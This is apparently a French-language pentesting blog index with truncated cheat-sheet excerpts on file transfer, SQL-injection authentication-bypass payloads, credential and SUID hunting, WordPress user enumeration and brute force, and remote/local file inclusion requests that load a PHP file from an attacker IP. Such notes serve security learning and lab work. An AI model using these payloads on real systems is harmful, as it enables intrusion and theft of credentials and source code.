Transfert de fichiers de la victime vers l’attaquant ou vice versa

Voici quelques méthodes pour transférer des fichiers. Dépendemment de la plateforme, il est pratique d’en connaître plusieurs. Parfois, certains logiciels sont bloqués par l’administrateur ou le pare-feu. Pour du simple copier-coller, un encodage base64 est la plupart suffisant. Voici les commandes pour Linux base64 -w0 <file> #Encoder le fichier base64 -d file #Décoder le fichier … Continuer la lecture

Injection SQL

Payloads ‘ )’ “ ` ‘) “) `) ‘)) “)) `)) -SLEEP(30); # Contournement de la vérification de mots de passe ‘ or 1=1 — ‘ or ‘1’=1 ‘ or 1=1 –+ user’ or 1=1;# user’ or 1=1 LIMIT 1;# user’ or 1=1 LIMIT 0,1;# Injections basés sur les unions SQL order by 1 UNION … Continuer la lecture

Crack de mots de passe en ligne

Il existe bien évidemment des utilitaires comme John the Ripper et Hashcat, mais des sites web ont déjà les hashes crackés de millions de passe. Il vaut la peine de tenter sa chance dans l’espoir de trouver la solution rapidement avant d’essayer soi-même. Voici donc une liste de sites web avec les protocoles supportés https://crackstation.net … Continuer la lecture

Trouver des fichiers sous Linux

find / -name "secret.txt" locate secret.txt (voir updatedb) essaie de trouver une chaîne de caractères dans plusieurs fichiers strings *.txt | grep password grep -l -i pass /var/log/*.log 2>/dev/null find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null trouver des fichiers SUID find / -perm /4000 -type f 2>/dev/null find / … Continuer la lecture

Énumération d’une cible utilisant Linux

Le script LinEnum.sh permet d’avoir un accès rapide à beaucoup d’informations: Informations sur le kernel Distribution : Ubuntu, Debian, etc. Nom d’hôte Nom de l’usager et groupes Utilisateurs qui se sont déjà connectés Utilisateurs actuellement connectés Liste de tous les usagers et des groupes auxquels ils appartiennent Liste d’utilisateurs appartenant au groupe ADM Vérifie si … Continuer la lecture

Énumération d’une cible utilisant Windows

Recherche de fichiers dans l’arborescence dir /s /b secret.txt Afficher le propriétaire d’un fichier dir /q notepad.exe Chercher des fichier possédant certains attributs dir /a:h notepad.exe (h : fichiers cachés s : fichiers systèmes, d : répertoire) Lister les ports netstat -aon | find /i "listening" | findstr 127.0.0.1 Lister les services windows tasklist /svc … Continuer la lecture

Stéganographie

La stéganographie permet de cacher un fichier dans un autre fichier (wav,jpg). Pour se faire, un utilitaire existe et permet aussi d’encrypter le fichier : steghide steghide embed -cf photo.jpeg -ef tohide.txt steghide extract -sf ./photo.jpeg inary steghide info ./photo.jpeg Exiftool permet d’avoir l’information sur l’emplacement exiftool somephoto.png : permet d’avoir de l’information : lieu … Continuer la lecture

Utilitaires pour le scan des CMS

Outils pour le scan des CMS ## scan Joomla joomscan -u http://www.searchevolution.com/security ## scan WordPress wpscan –url https://www.searchevolution.com/security ## lister les plugins WordPress (façon agressive) wpscan –url http://www.test.com/ –plugins-detection aggressive ## usagers WordPress wpscan –url http://10.10.10.2 –enumerate u ## trouver avec la force brute des usagers. utilitaire wp_login_user_enumeration.py python wp_login_user_enumeration.py -t https://www.searchevolution.com/security -u usernames.txt ## … Continuer la lecture

Test pour des vulnérabilités d’inclusion de fichiers

#Exploitation de RFI GET /blog/?lang=http://10.10.14.11/test.php #va échouer si l'inclusion de fichiers sur d'autres serveurs n'est pas permise GET /blog/?lang=//10.10.14.11/test/test.php #un chemin UNC est considéré local ## LFI, RFI, RCE uniscan -u http://192.168.44.134:10000/ -qweds ### Test for LFI # Harvest links from a page (to test for LFI) fimap -H -u “http://192.168.56.129” -d 3 -w /tmp/urllist … Continuer la lecture

Vulnérabilité PHP

== PHP == ## Lire le code source avec php://filter http://192.168.56.129/?page=upload // page original http://192.168.0.105/?page=php://filter/convert.base64-encode/resource=upload curl http://192.168.0.105/?page=php://filter/convert.base64-encode/resource=upload — Le résultat a besoin d’un décodage Base64